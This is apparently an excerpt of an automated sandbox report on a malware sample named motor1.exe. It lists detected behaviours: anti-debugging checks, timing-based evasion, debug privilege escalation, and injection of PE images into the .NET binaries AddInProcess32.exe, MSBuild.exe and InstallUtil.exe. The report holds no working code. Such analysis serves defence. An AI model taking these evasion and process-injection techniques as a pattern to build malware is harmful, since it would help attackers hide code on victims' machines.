Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	File Volume queried: C:\ FullSizeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	File Volume queried: C:\ FullSizeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	File Volume queried: C:\ FullSizeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File Volume queried: C:\ FullSizeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	File Volume queried: C:\ FullSizeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	File Volume queried: C:\ FullSizeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	File Volume queried: C:\ FullSizeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	File Volume queried: C:\ FullSizeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	File Volume queried: C:\ FullSizeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	File Volume queried: C:\ FullSizeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	File Volume queried: C:\ FullSizeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	File Volume queried: C:\ FullSizeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	File Volume queried: C:\ FullSizeInformation

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 922337203685477

Source: motor1.exe, 00000004.00000002.2544278781.00007FFD94758000.00000002.00000001.01000000.00000007.sdmp, motor1.exe, 00000015.00000002.2601305286.00007FFD928E8000.00000002.00000001.01000000.0000002C.sdmp	Binary or memory string: qEMutating a value collection derived from a dictionary is not allowed.Y
Source: motor1.exe, 00000004.00000002.2539797410.0000022D5F50C000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllt,
Source: pKxhpP0spW.exe, 00000001.00000000.2369285246.00007FF71BF09000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: lgnW2/4/PEZB31jiVg88O8EckzXZOFKs7sjsLjBOlDW0JB9LeGna8gI4zJVSk/BwJVmcIGfE
Source: AddInProcess32.exe, 00000005.00000002.4838057286.0000000000AF7000.00000004.00000020.00020000.00000000.sdmp, motor1.exe, 00000015.00000002.2598521100.000002144CE8C000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe

Process information queried: ProcessInformation

Jump to behavior

Anti Debugging

Potentially malicious time measurement code found

Source: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\motor1.exe	Code function: 4_2_00007FFD93B71380	4_2_00007FFD93B71380
Source: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\motor1.exe	Code function: 4_2_00007FFD93B71330	4_2_00007FFD93B71330
Source: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\motor1.exe	Code function: 4_2_00007FFD93E61380	4_2_00007FFD93E61380
Source: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\motor1.exe	Code function: 4_2_00007FFD93E61330	4_2_00007FFD93E61330
Source: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\motor1.exe	Code function: 4_2_00007FFD94261330	4_2_00007FFD94261330
Source: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\motor1.exe	Code function: 4_2_00007FFD94261380	4_2_00007FFD94261380

Checks if the current process is being debugged

Source: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\motor1.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\motor1.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\SystemRootDoc\motor1.exe	Process queried: DebugPort
Source: C:\Users\user\SystemRootDoc\motor1.exe	Process queried: DebugPort
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process queried: DebugPort
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process queried: DebugPort
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process queried: DebugPort
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process queried: DebugPort
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process queried: DebugPort
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process queried: DebugPort

Contains functionality for execution timing, often used to detect debuggers

Source: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\motor1.exe

Code function: 4_2_00007FFD93B71380 rdtsc

4_2_00007FFD93B71380

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Source: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\motor1.exe

4_2_00007FFDA384A990

Enables debug privileges

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process token adjusted: Debug
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process token adjusted: Debug
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process token adjusted: Debug
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process token adjusted: Debug
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process token adjusted: Debug
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process token adjusted: Debug

Source: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\motor1.exe	Code function: 4_2_00007FFD93D793A0 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	4_2_00007FFD93D793A0
Source: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\motor1.exe	Code function: 4_2_00007FFD944DD978 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	4_2_00007FFD944DD978
Source: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\motor1.exe	Code function: 4_2_00007FFDA384A5DC SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	4_2_00007FFDA384A5DC
Source: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\motor1.exe	Code function: 4_2_00007FFDA384AB78 SetUnhandledExceptionFilter,	4_2_00007FFDA384AB78
Source: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\motor1.exe	Code function: 4_2_00007FFDA384A990 IsProcessorFeaturePresent,memset,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	4_2_00007FFDA384A990
Source: C:\Users\user\SystemRootDoc\motor1.exe	Code function: 21_2_00007FFD9B1BBAC0 SetUnhandledExceptionFilter,	21_2_00007FFD9B1BBAC0
Source: C:\Users\user\SystemRootDoc\motor1.exe	Code function: 21_2_00007FFD9B1BBB30 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	21_2_00007FFD9B1BBB30
Source: C:\Users\user\SystemRootDoc\motor1.exe	Code function: 21_2_00007FFD9B1BB8D8 IsProcessorFeaturePresent,memset,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	21_2_00007FFD9B1BB8D8

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

Allocates memory in foreign processes

Source: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\motor1.exe	Memory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 400000 protect: page execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\motor1.exe	Memory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 400000 protect: page execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\motor1.exe	Memory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 400000 protect: page execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\motor1.exe	Memory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 400000 protect: page execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\motor1.exe	Memory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 400000 protect: page execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\motor1.exe	Memory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 400000 protect: page execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\motor1.exe	Memory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 400000 protect: page execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\motor1.exe	Memory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 400000 protect: page execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\motor1.exe	Memory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 400000 protect: page execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\motor1.exe	Memory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 400000 protect: page execute and read and write	Jump to behavior
Source: C:\Users\user\SystemRootDoc\motor1.exe	Memory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 400000 protect: page execute and read and write
Source: C:\Users\user\SystemRootDoc\motor1.exe	Memory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 400000 protect: page execute and read and write
Source: C:\Users\user\SystemRootDoc\motor1.exe	Memory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 400000 protect: page execute and read and write
Source: C:\Users\user\SystemRootDoc\motor1.exe	Memory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 400000 protect: page execute and read and write
Source: C:\Users\user\SystemRootDoc\motor1.exe	Memory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 400000 protect: page execute and read and write
Source: C:\Users\user\SystemRootDoc\motor1.exe	Memory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 400000 protect: page execute and read and write
Source: C:\Users\user\SystemRootDoc\motor1.exe	Memory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 400000 protect: page execute and read and write
Source: C:\Users\user\SystemRootDoc\motor1.exe	Memory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 400000 protect: page execute and read and write
Source: C:\Users\user\SystemRootDoc\motor1.exe	Memory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 400000 protect: page execute and read and write
Source: C:\Users\user\SystemRootDoc\motor1.exe	Memory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 400000 protect: page execute and read and write
Source: C:\Users\user\SystemRootDoc\motor1.exe	Memory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 400000 protect: page execute and read and write

Injects a PE file into a foreign processes

Source: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\motor1.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 400000 value starts with: 4D5A	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\motor1.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 400000 value starts with: 4D5A	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\motor1.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 400000 value starts with: 4D5A	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\motor1.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 400000 value starts with: 4D5A	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\motor1.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 400000 value starts with: 4D5A	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\motor1.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 400000 value starts with: 4D5A	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\motor1.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 400000 value starts with: 4D5A	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\motor1.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 400000 value starts with: 4D5A	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\motor1.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 400000 value starts with: 4D5A	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\motor1.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 400000 value starts with: 4D5A	Jump to behavior
Source: C:\Users\user\SystemRootDoc\motor1.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 400000 value starts with: 4D5A
Source: C:\Users\user\SystemRootDoc\motor1.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 400000 value starts with: 4D5A
Source: C:\Users\user\SystemRootDoc\motor1.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 400000 value starts with: 4D5A
Source: C:\Users\user\SystemRootDoc\motor1.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 400000 value starts with: 4D5A
Source: C:\Users\user\SystemRootDoc\motor1.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 400000 value starts with: 4D5A
Source: C:\Users\user\SystemRootDoc\motor1.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 400000 value starts with: 4D5A
Source: C:\Users\user\SystemRootDoc\motor1.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 400000 value starts with: 4D5A
Source: C:\Users\user\SystemRootDoc\motor1.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 400000 value starts with: 4D5A
Source: C:\Users\user\SystemRootDoc\motor1.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 400000 value starts with: 4D5A
Source: C:\Users\user\SystemRootDoc\motor1.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 400000 value starts with: 4D5A
Source: C:\Users\user\SystemRootDoc\motor1.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 400000 value starts with: 4D5A

Writes to foreign memory regions

Source: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\motor1.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 400000	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\motor1.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 402000	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\motor1.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 40C000	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\motor1.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 40E000	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\motor1.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 6A4008	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\motor1.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 400000	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\motor1.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 402000	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\motor1.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 40C000	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\motor1.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 40E000	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\motor1.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: C51008	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\motor1.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 400000	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\motor1.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 402000	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\motor1.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 40C000	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\motor1.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 40E000	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\motor1.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 732008	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\motor1.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 400000	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\motor1.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 402000	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\motor1.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 40C000	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\motor1.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 40E000	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\motor1.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: ABA008	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\motor1.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 400000	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\motor1.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 402000	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\motor1.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 40C000	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\motor1.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 40E000	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\motor1.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: CAE008	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\motor1.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 400000	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\motor1.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 402000	Jump to behavior
